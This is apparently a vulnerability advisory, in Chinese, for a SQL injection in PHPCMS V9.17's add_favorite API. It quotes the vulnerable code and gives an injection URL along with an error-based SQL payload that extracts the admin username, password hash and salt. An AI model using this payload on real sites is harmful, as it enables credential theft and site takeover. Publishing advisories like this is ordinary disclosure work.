PHPCMS V9.17 api/add_favorite.php SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

``` $title = urldecode($title); $data = array('title'=>$title, 'url'=>$url, 'adddate'=>SYS_TIME, 'userid'=>$userid); $favorite_db->insert($data); ``` api.php需要注册用户才能访问,因此利用需要注册用户,并且登录,然后可以直接提交: `/api.php?op=add_favorite&url=J&title=%2527%2520and%2520%2528select` ![](https://images.seebug.org/contribute/8d79d4da-4cf0-4548-800d-007a3be4ada6-1.png) 这里是V9,因此,我们构造一下语句先: ``` select count(*),concat((select (select (select concat(0x23,cast(concat(username,0x3a,password,0x3a,encrypt) as char),0x23) from v9_admin LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1' ``` ![](https://images.seebug.org/contribute/e3eacc8c-2e5f-43ea-b71e-a8fce9d61e59-2.png)

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息